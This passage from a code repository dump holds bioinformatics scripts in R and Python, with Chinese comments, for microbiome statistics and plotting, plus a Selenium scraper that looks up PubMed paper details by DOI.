c(\"Healthy\",\"SCAD\",\"UA\",\"MI\") # 改成外参\ncolor_order = c(\"#4daf4a\",\"#377eb8\",\"#984ea3\",\"#e41a1c\") #改成外参数,颜色需要和组别对应\ndf = read.table(diff_result, header=T, sep=\"\\t\", check.names = F)\ndiffID_sig = filter(df, pvalue < 0.01)$ID\ndiffID = filter(df, pvalue > 0.01 & pvalue < 0.05)$ID\ndiff_x = c()\nannotate_color = c() \nfor (i in 1:length(diffID)) {\n if ( diffID[i] %in% x_order) {\n diff_x = c(diff_x,(which(x_order == diffID[i])))\n\t\t\tannotate_color = c(annotate_color,color_order[which(group_order == filter(df, ID == diffID[i])$enriched)])\n }\n}\ndiff_sig_x = c()\nannotate_sig_color = c()\nfor (i in 1:length(diffID_sig)) {\n if ( diffID_sig[i] %in% x_order) {\n diff_sig_x = c(diff_sig_x,(which(x_order == diffID_sig[i])))\n\t\t\tannotate_sig_color = c(annotate_sig_color,color_order[which(group_order == filter(df, ID == diffID_sig[i])$enriched)])\n }\n}\npdf(\"./top.30.genus.log.txt.tt.boxplot.txt.pdf\",width=8,height=4,onefile=F)\nplot + annotate('text', x = diff_x, y = 0, label='*', color = annotate_color, size = 5) + annotate('text', x = diff_sig_x, y = 0, label='**', color = annotate_sig_color, size = 5)\ndev.off()\n"
},
{
"alpha_fraction": 0.6453407406806946,
"alphanum_fraction": 0.6641167998313904,
"avg_line_length": 68.90243530273438,
"blob_id": "1e344b90410f532b9953e504b489c56bd982385a",
"content_id": "2207c5035d72f59972341ccbcd353386e4c48aab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3466,
"license_type": "no_license",
"max_line_length": 417,
"num_lines": 41,
"path": "/Temp/zscore_heatmap_pstar.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "##绘制 zscore 的热图,并且用星星表示显著性差异,使用的数据是已经发表的文章的数据,涉及的文件我会放到同级的 Data 的目录下;\n#蔡军门水平 zscore\nlibrary('ComplexHeatmap')\nlibrary(png)\n#这个输入文件需要提前处理好,根据丰度文件\ndt = read.table(\"CJ_zscore_phylum.txt\", header=TRUE, sep=\"\\t\", comment.char = \"\", check.names = F, row.names=1)\n\n#读取注释文件,这个文件也是需要提前处理好,用来表示显著性差异的\ntemp = read.table('CJ_phylum_annotation_col.txt', sep = \"\\t\", header = TRUE, row.names = 1, comment.char = \"\", check.names = F)\n\n#首先画热图,需要得到聚类的顺序\np = Heatmap(dt,rect_gp = gpar(col = \"grey50\", lwd = 1), name = \"\", heatmap_legend_param = list(border = \"grey60\"), cluster_rows = F, cluster_columns = T,show_row_names = T)\ntemp_anno = temp[colnames(dt)[column_order(p)],]\n\n#注释文件的图片路径,这个脚本实际上是把星星的图片,绘制在了热图下边,所以需要提供图片文件,在 Data 目录下。类推的话,如果想画其他图片也是可以的,\np_png = \"Data/218-star-full.png\"\nlessp_png = \"Data/leessp.png\"\nno_sig_png = \"Data/no_sig.png\"\n\n#将注释文件的字符串转变为变量\nControl_vs_CHD = as.character(lapply(as.character(temp_anno$`Control vs CHD`), function(x) eval(parse(text = x))))\nControl_vs_STEMI = as.character(lapply(as.character(temp_anno$`Control vs STEMI`), function(x) eval(parse(text = x))))\nCHD_vs_STEMI = as.character(lapply(as.character(temp_anno$`CHD vs STEMI`), function(x) eval(parse(text = x))))\n\n#生成热图的注释\nha = HeatmapAnnotation(\n \"Control vs CHD\" = anno_image(Control_vs_CHD, border = F, height = unit(7,\"mm\"), space = unit(7, \"mm\")),\n \"Control vs STEMI\" = anno_image(Control_vs_STEMI,border = F, height = unit(7,\"mm\"), space = unit(7, \"mm\")),\n \"CHD vs STEMI\" = anno_image(CHD_vs_STEMI,border = F, height = unit(7,\"mm\"), space = unit(7, \"mm\")),\n annotation_name_gp = gpar(fontsize = 20) # 调节大小\n ## 上边是门水平的脚本,如果画属或者种的话,需要调节图片的参数\n #\"NCA vs sCAD\" = anno_image(NCA_vs_sCAD, border = F, height = unit(4,\"mm\"), space = unit(4, \"mm\")), #需要通过调节参数控制图片大小\n #\"NCA vs AMI\" = anno_image(NCA_vs_AMI,border = F,height = unit(4,\"mm\"),space = unit(4, \"mm\")), \n #\"sCAD vs AMI\" = anno_image(sCAD_vs_AMI,border = F,height = unit(4,\"mm\"), space = unit(4, \"mm\"))\n)\n\npdf(\"phylum_heatmap.pdf\", height = 8, width =8)\nHeatmap(dt, color = c(\"navy\", \"white\", \"firebrick3\"), rect_gp = gpar(col = \"grey50\", lwd = 1), name = \"\", heatmap_legend_param = list(border = \"grey50\"), cluster_rows = F, cluster_columns = T,show_row_names = T, bottom_annotation = ha, width = unit(2*ncol(dt), \"cm\"), height = unit(2*nrow(dt), \"cm\"), row_names_gp = gpar(fontsize = 20), column_names_gp = gpar(fontsize = 20))\n##这个也是,有时候需要调节 cell ,字体大小什么的,不同水平的都要针对性的调整\n#Heatmap(dt, color = c(\"navy\", \"white\", \"firebrick3\"), rect_gp = gpar(col = \"grey50\", lwd = 1), name = \"\", heatmap_legend_param = list(border = \"grey50\"), cluster_rows = F, cluster_columns = T,show_row_names = T, bottom_annotation = ha, width = unit(4*ncol(dt), \"mm\"), height = unit(4*nrow(dt), \"mm\"), row_names_gp = gpar(fontsize = 10), column_names_gp = gpar(fontsize = 10), heatmap_height = 10, heatmap_width = 10)\ndev.off() \n"
},
{
"alpha_fraction": 0.6609397530555725,
"alphanum_fraction": 0.6660158634185791,
"avg_line_length": 39.43684387207031,
"blob_id": "97449ae535058f17a9d63439d8cf2c49be873a9c",
"content_id": "f300ce0c9af9ae7a2fbefe6f5ad0930392c92c52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7683,
"license_type": "no_license",
"max_line_length": 292,
"num_lines": 190,
"path": "/16S/core_OTU.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n\nimport pandas as pd\nimport rpy2.robjects as robjects\nimport numpy as np\nfrom itertools import combinations\nfrom collections import defaultdict\nimport argparse,os,math\n\nparser = argparse.ArgumentParser(\n\tformatter_class=argparse.RawDescriptionHelpFormatter,\n\tdescription='''\n-------------------\nSimple Introduction:\nGenerate the core OTU results.\nExample: python3 core_OTU.py -i filter_OTU_shared_final.xls -g plant.bms.txt.all.new.name -s SubGroup3 -p SubGroup1 -o outdir\nTo be continued.\n------------------'''\n)\n\nparser.add_argument('-i','--Input', help = \"the OTU abundance file, eg filter_OTU_shared_final.xls.\")\nparser.add_argument('-g','--group', help = \"the group file,eg plant.bms.txt.all.new.name.\")\nparser.add_argument('-s','--sample', help = \"the column name of sample ID line,eg SubGroup3.\")\nparser.add_argument('-p','--groupname', help = \"the column name of group name for analysis,eg SubGroup1.\")\nparser.add_argument('-t','--threshold', help = \"threshold for core OTU, default is 0.8.\", type = float, nargs = \"?\")\nparser.add_argument('-o','--outdir', help = \"the output directory\", nargs = \"?\")\nargs=parser.parse_args()\n\n(otu_file, group_file, sample_ID, group_par) = (args.Input, args.group, args.sample ,args.groupname)\n\npar = [otu_file, group_file, sample_ID, group_par]\nif not all(par):\n\t\tparser.print_help()\n\t\texit()\n\nthreshold = args.threshold if args.threshold else 0.8\noutdir = args.outdir if args.outdir else './'\nif not os.path.exists(outdir):\n\tos.mkdir(outdir)\n\n# merge OTU table for samples with repeat\ndef merge_otu(group_file, otu_file, sample_ID, outdir):\n\tsample = dict()\n\twith open(group_file, 'r') as IN:\n\t\tgroup_header = IN.readline().strip('\\n').split('\\t')\n\t\tsampleID_index = group_header.index(sample_ID)\n\t\tfor line in IN:\n\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\tsample[lst[0]] = lst[sampleID_index]\n\twith open(otu_file, 'r') as IN, open(outdir + '/merge_OTU_profile.txt', 'w') as out:\n\t\totu_header = IN.readline().strip('\\n').split('\\t')\n\t\tsample[otu_header[0]] = otu_header[0]\n\t\tnew_header = [sample[x] for x in otu_header if x in sample]\n\t\tRemove_duplicates = list(set(new_header))\n\t\tRemove_duplicates.remove(new_header[0])\n\t\tout_header = otu_header[0] + '\\t' + '\\t'.join([str(x) for x in sorted(Remove_duplicates)]) ##import of sort\n\t\tprint(out_header, file=out)\n\t\tfor line in IN:\n\t\t\tlst = line.strip('\\n').split('\\t')\n\t\t\toutID = lst[0]\n\t\t\tzeroINsample = list()\n\t\t\tcounts = defaultdict(float) # value will initialize to 0\n\t\t\tsum = defaultdict(float)\n\t\t\tmean_OTU = dict()\n\t\t\tfor x in range(1,len(lst)):\n\t\t\t\tif lst[x] == '0':\n\t\t\t\t\tzeroINsample.append(new_header[x])\n\t\t\t\tcounts[new_header[x]] += 1\n\t\t\t\tsum[new_header[x]] += float(lst[x])\n\t\t\tequal = out_header.split('\\t')\n\t\t\tequal.remove(new_header[0])\n\t\t\tif equal != sorted(counts.keys()):\n\t\t\t\tprint('Something wrong! Please contact me~')\n\t\t\t\texit()\n\t\t\tfor key in sorted(counts.keys()): #here to be sort for consistent\n\t\t\t\tif key not in zeroINsample:\n\t\t\t\t\tmean = sum[key]/counts[key]\n\t\t\t\t\tmean_OTU[key] = mean\n\t\t\t\telse:\n\t\t\t\t\tmean_OTU[key] = 0\n\t\t\tout_list = list()\n\t\t\tfor key in sorted(mean_OTU.keys()):\n\t\t\t\tout_list.append(mean_OTU[key])\n\t\t\tout_line = outID + '\\t' + '\\t'.join([str(x) for x in out_list])\n\t\t\tprint(out_line, file=out)\n\tprint(\"Generate merged OTU table: \" + \"merge_OTU_profile.txt\")\n\n# common otu table\ndef common_OTU(group_par, sample_ID, threshold, outdir):\n\tcommon_OTU_list = list()\n\tall_groups = group[group_par].unique()\n\tfor item in all_groups:\n\t\tlst = group.loc[group[group_par] == item,:][sample_ID].unique()\n\t\tsub_dt = dt[lst]\n\t\tsample_num = sub_dt.shape[1]\n\t\tthreshold = sample_num*threshold\n\t\tthreshold_num = sample_num*threshold\n\t\ttemp_OTU = sub_dt[(sub_dt != 0).sum(axis = 1) > threshold_num]\n\t\ttemp_OTU_dt = sub_dt.loc[temp_OTU.index,:]\n\t\ttemp_OTU_dt.to_csv(outdir + '/' + item + '_commonOTU.xls', sep ='\\t')\n\t\tprint(\"Generating the common OTU file: \" + item + \"_commonOTU.xls\")\n\t\tcommon_OTU_list = list(temp_OTU.index) + common_OTU_list\n\tfinal_OTU = list(set(common_OTU_list))\n\tcommon_OTU_dt = dt.loc[final_OTU,:]\n\toutfile = '_'.join(all_groups) + '_commonOTU.xls'\n\tcommon_OTU_dt.to_csv(outdir + '/' + outfile, sep ='\\t')\n\tprint(\"Generating the common OTU file: \" + outfile)\n\n# stat the each two group core OTU\ndef core_otu(compare_group, group_par, sample_ID, common_OTU, outdir):\n\tcommon_OTU_dt = pd.read_table(common_OTU, index_col=0, sep = '\\t')\n\t#(compare_group, group_par, sample_ID) = (group_info, group_par, sample_ID)\n\tformer_group = compare_group[0]\n\tlatter_group = compare_group[1]\n\thead = ['otuID', 'mean(' + former_group + ')', 'sd(' + former_group + ')', 'mean-rank(' + former_group + ')', 'occ-rate(' + former_group + ')','mean(' + latter_group + ')', 'sd(' + latter_group + ')', 'mean-rank(' + latter_group + ')', 'occ-rate(' + latter_group + ')', 'enrcihed', 'pvalue']\n\tout_header = '\\t'.join(head)\n\tout = open('_'.join(compare_group) + '_temp_diff.xls', 'w')\n\tprint(out_header, file = out)\n\tfor otu in common_OTU_dt.index:\n\t\tformer_lst = group.loc[group[group_par] == former_group,:][sample_ID].unique()\n\t\tlatter_lst = group.loc[group[group_par] == latter_group,:][sample_ID].unique()\n\t\tformer_abd = common_OTU_dt.loc[otu][former_lst]\n\t\tlatter_abd = common_OTU_dt.loc[otu][latter_lst]\n\n\t#calcultate mean\n\t\tformer_mean = former_abd.mean()\n\t\tlatter_mean = latter_abd.mean()\n\n\t#calculate sd\n\t\tformer_sd = former_abd.std()\n\t\tlatter_sd = latter_abd.std()\n\n\t# calculate occurrence\n\t\tformer_occ = (former_abd != 0).sum()/len(former_abd)\n\t\tlatter_occ = (latter_abd != 0).sum()/len(latter_abd)\n\n\t# calculate rank for enrich\n\t\trank = robjects.r['rank']\n\t\ttwo_lst = list(common_OTU_dt.loc[otu][list(former_lst) + list(latter_lst)])\n\t\tRank = list(np.array(rank(robjects.FloatVector(two_lst))))\n\t\tformer_rank = Rank[:len(list(former_lst))]\n\t\tlatter_rank = Rank[len(list(former_lst)):]\n\t\tformer_rank_mean = np.mean(former_rank)\n\t\tlatter_rank_mean = np.mean(latter_rank)\n\t\tif former_rank_mean > latter_rank_mean:\n\t\t\tenrich = former_group\n\t\telif former_rank_mean < latter_rank_mean:\n\t\t\tenrich = latter_group\n\t\telse:\n\t\t\tenrich = 'None'\n\n\t# calculate the pvalue\n\t\tformer_vector = robjects.FloatVector(list(former_abd))\n\t\tlatter_vector = robjects.FloatVector(list(latter_abd))\n\t\twilcox = robjects.r['wilcox.test']\n\t\tpvalue = np.array(wilcox(former_vector,latter_vector)[2])[0]\n\t\tif not math.isnan(pvalue):\n\t\t\tline = [otu,former_mean, former_sd, former_rank_mean, former_occ, latter_mean, latter_sd, latter_rank_mean, latter_occ, enrich, pvalue]\n\t\t\tline = [str(x) for x in line]\n\t\t\tout_line = '\\t'.join(line)\n\t\t\tprint(out_line, file = out)\n\tout.close()\n\n\t# calculate the q value\n\tdt_pvalue = pd.read_table('_'.join(compare_group) + '_temp_diff.xls', sep='\\t', index_col=0)\n\tp_adjuste = robjects.r('p.adjust')\n\tqvalue = p_adjuste(robjects.FloatVector(list(dt_pvalue['pvalue'])))\n\tdt_pvalue['qvalue'] = qvalue\n\toutfile = '_'.join(compare_group) + '_diff.xls'\n\tdt_pvalue.to_csv(outdir + '/' + outfile, sep='\\t')\n\tos.remove('_'.join(compare_group) + '_temp_diff.xls')\n\tprint(\"Generate the final results: \" + outfile)\n\n# process the otu table\nmerge_otu(group_file, otu_file, sample_ID, outdir)\n\n# common OTU\ndt = pd.read_table(outdir + '/merge_OTU_profile.txt', header = 0, index_col = 0, sep = '\\t')\ngroup = pd.read_table(group_file, header = 0, index_col = 0, sep = '\\t')\ngroup_par = group_par\nsample_ID = sample_ID\nthreshold = float(threshold)\n\nall_groups = group[group_par].unique()\ncommon_OTU(group_par, sample_ID, threshold, outdir)\ncommon_OTU_file = outdir + '/' + '_'.join(all_groups) + '_commonOTU.xls'\n\n# core OTU\nfor compare_group in combinations(all_groups, 2):\n\tcore_otu(compare_group,group_par, sample_ID, common_OTU_file, outdir)\n"
},
{
"alpha_fraction": 0.6242263317108154,
"alphanum_fraction": 0.6268788576126099,
"avg_line_length": 40.88888931274414,
"blob_id": "0cce982f0e8522cc94df1a0f1d2376410ec9cde0",
"content_id": "23c08e3fa80f02ac7823d0e77e5eccfa9b526590",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 27,
"path": "/multiple_liner.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# /usr/bin/Rscript\n#数据在本地,利用多元线性回归校正混在因子,得出相应的 P 值,待完善....\ndt = read.table('SamplingTime_BMI_gout.tsv', header = T)\nend = length(colnames(dt))\npara = c(\"SamplingTime\",\"BMI\")\noutfile = paste(c(para,\"lm.txt\"), collapse=\"_\")\nhead = \"Tax\\tFactor\\tEstimate\\tStd. Error\\tt value\\tP_value\"\ncat(head, file=outfile, sep=\"\\n\")\nstart = length(para) + 2\nfor(i in start:end){\n tax = colnames(dt)[i]\n temp_rowname = c(para,tax)\n temp_dt = dt[temp_rowname]\n run = paste(\"model = lm(\", tax, \" ~., data=temp_dt)\", sep=\"\")\n eval(parse(text = run)) #再一次用到了将变量转化为表达式的问题。。。特别容易忘记啊...\n dt_p = as.data.frame(summary(model)$coefficient)\n dt_res = dt_p[-1,] # 去掉截距,感觉暂时用不到,其他元素保留输出\n colnames(dt_res)[length(colnames(dt_res))] = 'P_value'\n part_head = paste(colnames(dt_res),collapse = \"\\t\") # 连接向量\n #head = paste('Tax\\tFactor',part_head, sep=\"\\t\")\n for(i in(1:length(rownames(dt_res)))){\n sub_line = paste(dt_res[rownames(dt_res)[i],], collapse=\"\\t\")\n line = paste(tax,rownames(dt_res)[i], sub_line,sep=\"\\t\")\n cat(line, file = outfile, sep=\"\\n\", append=T)\n }\n}\n# 先处理成这样子吧,后续的按照表型因子分开以及 P 值的校正,后边再处理\n"
},
{
"alpha_fraction": 0.6838235259056091,
"alphanum_fraction": 0.7156862616539001,
"avg_line_length": 31.639999389648438,
"blob_id": "595122961faf770c5a06d59e9f5ca67c7c123f02",
"content_id": "204d4780f0714b0ec9839c8ce955531106e044d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 1038,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 25,
"path": "/Anosim.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "library(ggplot2)\nlibrary(vegan)\ndata(iris)\ndt = subset(iris, select = -Species)\niris.dist = vegdist(dt)\nm = monoMDS(iris.dist)\ndat = as.data.frame(m$points)\ndat$group = iris$Species\nggplot(dat, aes(MDS1,MDS2, col=group, shape=group)) + geom_point() +\n theme(\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"))\niris.anno = anosim(iris.dist, iris$Species, permutations = 999)\niris.anno\n#Call:\n#anosim(x = iris.dist, grouping = iris$Species, permutations = 999) \n#Dissimilarity: bray \n\n#ANOSIM statistic R: 0.8576 R=0,表示组间没有差异,说明实验组和对照组之间没有差异;R> 0,表示组间差异大于组内差异,说明实验组和对照组之间存在差异\n# Significance: 0.001 当然,如果我们得出R值大于0, 还不足以说明实验组和对照组之间存在差异,我们还缺少一个p值,此时常用的检验方法是Permutation Test (置换检验)\n\n#Permutation: free\n#Number of permutations: 999\n\nplot(iris.anno)\n"
},
{
"alpha_fraction": 0.6571428775787354,
"alphanum_fraction": 0.6571428775787354,
"avg_line_length": 7.75,
"blob_id": "694f3d415324f4898d85bf20aa6e709a7712a76b",
"content_id": "5dffdd46f2a7117f6e6028cadca55df81a58d3f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 81,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 4,
"path": "/Temp/Data/README.md",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "### 这里是不知道写什么的标题\n\n*** \n这里需要放一些输入文件\n"
},
{
"alpha_fraction": 0.5951626896858215,
"alphanum_fraction": 0.634321928024292,
"avg_line_length": 41.87654495239258,
"blob_id": "316d3b8f67b4e149c0327353d5417088c0674d12",
"content_id": "a4d73c006217249387825adef13986010c1da714",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 3639,
"license_type": "no_license",
"max_line_length": 302,
"num_lines": 81,
"path": "/16S/group_barplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/Rscript\n############################################################\n# 画 barplot 的时候加上分组信息;加了 R 的外参;\n# usage: Rscript temp.R -i barplot.txt -t Otu9:Otu21:Otu25:Otu20:Otu30:Otu387:Otu34:Otu96:Otu111:Otu45:Otu420:Otu250:Otu63:Otu91:Otu148:Otu391:Otu367 -r r:y:rj:yj:zzd:zzs -c 3e523b:cca18d:8accc0:6f94bc:432c4f:763c32:ca94c7:69843d:77d28c:bf4579:6555ae:c98a39:d0d155:d34c3d:cb4cc3:75d549:7040cb -p prefix\n# 如示例所示:需要配置排序后的 OTU 和 色值,提供色值的网站可以在这里找: http://tools.medialab.sciences-po.fr/iwanthue/,程序稍微处理下就可以用了\n############################################################\n\nlibrary(ggplot2)\nlibrary(grid)\nlibrary(dplyr)\nlibrary(getopt)\nargs <- commandArgs(trailingOnly = FALSE)\nprogram <- sub(\"--file=\", \"\", args[grep(\"--file=\", args)])\n\n#SCRIPTPATH <- dirname(program)\n#source(paste(SCRIPTPATH,'/ggplot2_themes.R',sep=''))\n#source('./ggplot2_themes.R')\n\nspec <- matrix(c(\n 'help','h',0,'logical','',\n 'barplot.txt','i',1,'character','input YL OTU per table',\n 'legendID','t',1,'character','the legend ID in order (tax or otu), separated by colon',\n 'group_name','r',1,'character','the group names in order, separated by colon',\n 'colorID','c',2,'character', 'the color set for plot, separated by colon',\n 'prefix','p',1,'character', 'the prefix for output file',\n 'outdir','o',2,'character','output dir',\n 'log','l',2,'character','log file'\n),ncol=5,byrow=TRUE)\nopt <- getopt(spec)\n#cat(getopt(spec, usage=TRUE))\n\n# if help was asked for print a friendly message\n# and exit with a non-zero error code\nif( !is.null(opt$help)) {\n cat(getopt(spec, usage=TRUE));\n q(status=1);\n}\n\nif( is.null(opt$outdir) ) { opt$outdir <- './'}\nif( is.null(opt$frequency)) {opt$frequency <- 0.8}\nif( is.null(opt$log)) {opt$log <- 'log.txt'}\n\nSys.setenv(TZ=\"Asia/Shanghai\")\n#Sys.getenv(\"TZ\")\ncat(\"group_barplot.R program starts at:\", format(Sys.time(), \"%a %b %d %X %Y\"),'\\n',append=TRUE,file=opt$log)\n##########\n## process input parameters\ndt <- read.table(opt$barplot.txt, header=T, sep=\"\\t\")\nlegendID <- unlist(strsplit(opt$legendID, \":\"))\ngroup_name <- unlist(strsplit(opt$group_name, \":\"))\nif( !is.null(opt$colorID) ) { colorID <- c(paste(\"#\",unlist(strsplit(opt$colorID, \":\")),sep=\"\"))}\n# 以后完善同一组内排序的问题吧..\n#if( !is.null(opt$x_order)) {\n#\tx_order <- c(paste(\"#\",unlist(strsplit(opt$x_order, \":\")),sep=\"\"))\n#\tdt$individual_order = factor(dt$individual, level=x_order)\n#}\ndt$order <- factor(dt$group, levels=group_name)\noutfile = paste(opt$prefix,'OTU.pdf', sep='_')\n\npdf(paste(opt$outdir,outfile,sep=\"/\"), width = 8, height = 6, onefile=FALSE)\n\np = ggplot(dt,aes(x=dt$individual,y=dt$abundance,fill=factor(dt$tax, levels= rev(legendID)))) +\n geom_bar(stat = \"identity\", color = \"#56666B\", size = 0.1) +\n labs(x = \"Inidividuals\", y = \"Relative Abundance\") +\n scale_fill_manual(values= colorID) + \n theme_bw() +\n theme(axis.title = element_text(size = 12),\n axis.text = element_text(colour = \"black\", size = 8),\n axis.text.x = element_text(hjust = 1,angle=65,color=\"black\"),\n legend.title = element_blank(),legend.key.size=unit(3,\"mm\"),\n legend.text=element_text(size=10)) +\n facet_wrap(~order, strip.position = \"bottom\", nrow = 1, scales=\"free_x\")\n\n#调整每组的距离,\ngt = ggplotGrob(p)\nN<- dt%>% group_by(order)%>% summarise(count = length(unique(individual)))\npanelI <- gt$layout$l[grepl(\"panel\", gt$layout$name)]\ngt$widths[panelI] <- unit(N$count, \"null\")\ngrid.newpage()\ngrid.draw(gt)\ndev.off()\n"
},
{
"alpha_fraction": 0.5777980089187622,
"alphanum_fraction": 0.5932666063308716,
"avg_line_length": 33.34375,
"blob_id": "ea0c2a93fa10c36541f2cc5ee33b4dd75a66b3b6",
"content_id": "cd0be95b5d522cea7da04d48719da0f215a8409f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1329,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 32,
"path": "/CHD/bray_curtis.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "## beta 多样性矩阵文件处理, 输出用于画箱线图的组内和组间的距离文件\nimport pandas as pd\ndt = pd.read_table('braycurtis.txt', index_col = 0) #距离矩阵文件\ngroup = pd.read_table('info.xls', index_col=0) #表型文件\ngroup_dict = group['Group'].to_dict() #生成样品-组名的字典\n\n##两两样品名作为键,距离值作为值,生成字典..\ndistance = dict()\nfor Id1 in dt.columns:\n for Id2 in dt.columns:\n key = Id1 + ':' + Id2\n key_temp = Id2 + ':' + Id1\n value = dt.loc[Id1,Id2]\n if (key in distance) or (key_temp in distance): # 判断是否有重复的\n continue\n else:\n distance[key] = value\n \nout = open('intra_distance.txt','w') # 生成画 boxplot 的文件\nprint('individuals\\tdistance\\tgroup', file=out)\nn = 0\nfor key in distance:\n key_split = key.split(':')\n if key_split[0] == key_split[1]: #如果是同一个体, 则跳过;\n n = n +1\n continue\n if group_dict[key_split[0]] == group_dict[key_split[1]]: #判断是否同组,\n print('\\t'.join([key, str(distance[key]), group_dict[key_split[0]]]), file=out)\n else:\n print('\\t'.join([key, str(distance[key]), 'sCAD-AMI']), file=out) #否的话,输出组间样品距离的值\n#print(n) #测试用\nout.close()\n"
},
{
"alpha_fraction": 0.6481304168701172,
"alphanum_fraction": 0.6586769223213196,
"avg_line_length": 46.40909194946289,
"blob_id": "21a5599d9a99ca9239f73abdcf0804e8f4a786bb",
"content_id": "bb5b5bfa7a1b5c278bfd401177c5eed2bcefe591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1217,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 22,
"path": "/CHD/combine_barplot.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#对于任一指定水平生成按照分组对物种丰度取均值的文件,用于画合并的 barpolot 图,同时输出了物种的顺序, 输入文件在 Data 目录下\nabd = pd.read_table('CJ_phylum_abd.txt', index_col=0)\nabd = abd.drop('Tax_detail', axis=1) #我们的文件需要注释掉这一行\ngroup = pd.read_table('CJ_phylum_map.txt', index_col=0)\nsample_group = group.to_dict()\ngroups = list(group['Description'].unique())\ndt_list = list()\nfor item in groups:\n dt = abd[[x for x in abd.columns if sample_group['Description'][x] == item]].mean(axis=1).to_frame(name='Mean')\n large = dt.loc[dt['Mean'] > 0.01] # 这里是合并低丰度物种,阈值要根据实际情况调整...\n small = dt.loc[dt['Mean'] <= 0.01]\n small_merge = small.sum().to_frame(name = 'Others').T\n dt_merge = pd.concat([large,small_merge])\n dt_merge['Group'] = item\n dt_list.append(dt_merge)\nbar_dt = pd.concat(dt_list)\nbar_dt['Tax'] = bar_dt.index\nbar_dt = bar_dt[['Tax', 'Mean', 'Group']]\nbar_dt.to_csv('test.txt', index=0, sep='\\t')\ntax_order = list(bar_dt.groupby('Tax').mean().sort_values(by = 'Mean', ascending = False).index)\nwith open('plot_tax_order', 'w') as out:\n print(tax_order, file=out)\n"
},
{
"alpha_fraction": 0.556639552116394,
"alphanum_fraction": 0.5905148983001709,
"avg_line_length": 36.272727966308594,
"blob_id": "0c7a6d636061953829704c1cebbf361e5e6393d0",
"content_id": "6e10fbbe054e6af52e34d9eddbac8393fae5ca06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3962,
"license_type": "no_license",
"max_line_length": 214,
"num_lines": 99,
"path": "/爬虫/advanced_paper_informational.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver import ActionChains \nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys #这个没有用上\nimport time,os,re\n\n# browser = webdriver.Chrome() # 这个是模拟浏览器打开.. \nop = webdriver.ChromeOptions()\nop.add_argument('headless')\nbrowser = webdriver.Chrome(options=op) #op 这三行可以不用打开浏览器..\nurl = 'https://pubmed.ncbi.nlm.nih.gov/'\n\n\nout = open('paper_information.xls', 'w')\ndoi_list = ['DOI: 10.1016/S0140-6736(19)32319-0', 'DOI: 10.1038/s41575-019-0209-8','DOI: 10.1016/j.tips.2019.04.006','DOI: 10.1038/nrc2857', 'DOI: 10.1038/ismej.2015.11', 'DOI: 10.1038/s41591-018-0160-1'] \n \n# 杂志名称全称\nj_name = dict()\nwith open('J_Medline.txt', 'r') as IN:\n for line in IN:\n line = line.strip('\\n')\n if line.startswith('JournalTitle'): \n if re.search(' \\(.*\\)', line): #发现有带(London, England)这种信息的。。。。\n match = re.search('JournalTitle: (.*) \\(.*\\)', line) \n else:\n match = re.search('JournalTitle: (.*)', line) # ncbi 是缩写,然后影响因子是全称,所以得找到这个信息\n full = match.group(1)\n if line.startswith('MedAbbr'):\n match = re.search('MedAbbr: (.*)', line)\n abbr = match.group(1)\n if line.startswith('NlmId'):\n j_name[abbr] = full\n \n# 杂志 IF\nimport pandas as pd\ndt = pd.read_table('IF_2019.txt', index_col = 1)\nIF_dict = dt['Journal Impact Factor'].to_dict()\n\nfor x in doi_list:\n DOI = x\n browser.get(url)\n time.sleep(3)\n browser.find_element_by_xpath('//*[@name=\"term\"]').send_keys(x)\n time.sleep(2)\n browser.find_element_by_xpath('//*[@class=\"search-btn\"]').click()\n time.sleep(2)\n soup = BeautifulSoup(browser.page_source, \"html.parser\")\n \n # journal name abbr\n journal = soup.find(id = \"full-view-journal-trigger\").get_text().strip()\n\n # title\n title = soup.find(class_ = \"heading-title\").get_text().strip()\n \n # IF\n for x in IF_dict:\n match = re.search('^' + j_name[journal] + '$', x, flags=re.IGNORECASE) # 有的名字包含其他杂志的全称... \n if match:\n IF = IF_dict[x]\n journal_name = j_name[journal]\n else:\n match = re.search('^' + j_name[journal].replace('.','') + '$', x, flags=re.IGNORECASE) # 有的杂志匹配出来的全称多了个点:Nature reviews. Immunology\n if match:\n journal_name = j_name[journal].replace('.','')\n IF = IF_dict[x]\n\n\n # 发表时间\n if soup.find(class_ = \"secondary-date\"):\n p_time = soup.find(class_ = \"secondary-date\").get_text().strip().strip('Epub ').strip('.')\n else:\n p_time = soup.find(class_ = \"cit\").get_text().split(\";\")[0]\n\n # PMID \n PMID = soup.find(class_ = \"current-id\").get_text()\n\n\n #原文链接\n 